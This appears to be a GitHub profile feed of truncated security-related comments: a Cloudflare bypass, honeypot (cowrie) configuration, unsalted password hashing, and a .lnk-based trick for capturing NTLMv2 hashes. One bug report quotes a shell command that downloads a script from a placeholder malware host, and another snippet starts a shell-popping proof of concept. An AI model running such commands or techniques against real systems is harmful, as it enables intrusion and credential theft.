Dylan Katz
Can't CloudFlare fix this? I'm assuming it's been reported to them, right? It seems like a major security flaw as it allows people to bypass their entire system if they...
Added support for configuring dots/dashes changing score. Ideally all factors impacting score should be configurable (untrusted CAs, ignored keywords like email, etc) or at least visible, but this met my...
This change drastically increases the success rate for getting NTLMv2 hashes. The gist of it is, the img file I added contains a single Windows shortcut (.lnk) file with an...
Hi, I've noticed that a lot of tutorials/example configs for cowrie don't realize/acknowledge the risks of internal metadata APIs for something like AWS or Google Cloud. Would it be worthwhile...
#### Issue details First, is this project being actively maintained? There are several open PRs and issues that seemingly haven't been addressed, and the last commit was in July of last...
I made a PoC for your PoC so I can pop shells while you pop shells: ``` echo '''HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: localhost Cookie: ASP.NET_SessionId=test-sess-id Time id="__VIEWSTATEGENERATOR"...
The PR in question notified everyone in EpicGames/Developers, a group of almost 400,000 Unreal Engine users. Shortly after, someone tagged the Microsoft org (https://github.com/orgs/microsoft/people), which may have also notified those...
Complaining about someone using masscan to mass scan their network "Some idiot is using your tool to mass scan our network" ez link: https://github.com/robertdavidgraham/masscan/issues/482
Currently the default password used by this project is unsalted sha256. This is unsafe due to advances in modern computing power and rainbow table attacks. To give some context, I...
Similar to #152, commands such as "yum -y install wget" get parsed as files for downloading. Vice versa, "cd /etc;wget -c http://malware.badpersonwebsite.bad/download.sh" will not download "download.sh".